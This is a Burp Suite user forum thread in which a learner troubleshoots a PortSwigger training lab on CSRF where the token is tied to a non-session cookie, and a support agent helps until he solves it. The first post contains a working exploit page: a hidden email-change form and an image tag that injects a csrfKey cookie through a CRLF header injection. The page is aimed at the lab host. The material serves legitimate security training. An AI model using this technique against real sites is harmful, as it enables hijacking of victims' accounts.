Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

problème avec lab #5

john | Last updated: Aug 11, 2023 12:58PM UTC

L'e-mail de la victime dans lab #5 n'est pas modifié dans lorsque je soumets la demande avec la clé et le jeton CSRF du hackeur (carlos). j'ai vérifié que j'utilisais un nouveau jeton CSRF. J'ai suivi les instructions de YouTube mais cela n'a toujours pas été résolu j'ai essayé. 1. avec les outils de developpemt du navigateur j'ai Obtenu les jetons "csrf" "CSRFkey" du hackeur (carlos). 2. Création de la page HTML ci-dessous : <html> <body> <form name='myForm' id='myForm' method="POST" action="https://0a50007203aa3be7818c664f00690097.web-security-academy.nethttps://0a50007203aa3be7818c664f00690097.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="wiener10%40gmail.com"/> <input type="hidden" name="csrf" value="YfTDibotVKMG62ifaRXYeO7GnFHp7D0n"/> <input type="submit" value="Submit"> </form> <img src="https://0a50007203aa3be7818c664f00690097.web-security-academy.net/?search=abc%0d%0aSet-Cookie:%20csrfKey=fzihEzEnBDVnczoNgTn2HkhEcvlLktuK%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> <html>

Michelle, PortSwigger Agent | Last updated: Aug 11, 2023 01:52PM UTC

Hi Thanks for getting in touch. Can you please confirm the name of the lab you are working on? I just want to confirm I am looking at the labs in the same order so that I can check lab #5 is the same one you are looking at.

john | Last updated: Aug 13, 2023 04:31PM UTC

désolé pour ce manque de précision. j'utilise "Lab: CSRF where token is tied to non-session cookie"

Michelle, PortSwigger Agent | Last updated: Aug 14, 2023 03:13PM UTC

Hi Thanks for confirming the lab name :) I've just run through that lab here and was able to solve it. One thing to remember is that you will need to change the email address to one that you have not already used. Have you tried following along with one of the Community Solution videos?

john | Last updated: Aug 15, 2023 02:40PM UTC

salut! effectivement il y'avait une erreur dans mon adresse email. j'ai visionner les videos et j'ai résolu à résoudre le laboratoire. merci beaucoup

john | Last updated: Aug 15, 2023 02:40PM UTC

salut! effectivement il y'avait une erreur dans mon adresse email. j'ai visionné les videos et j'ai résolu le laboratoire. merci beaucoup

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.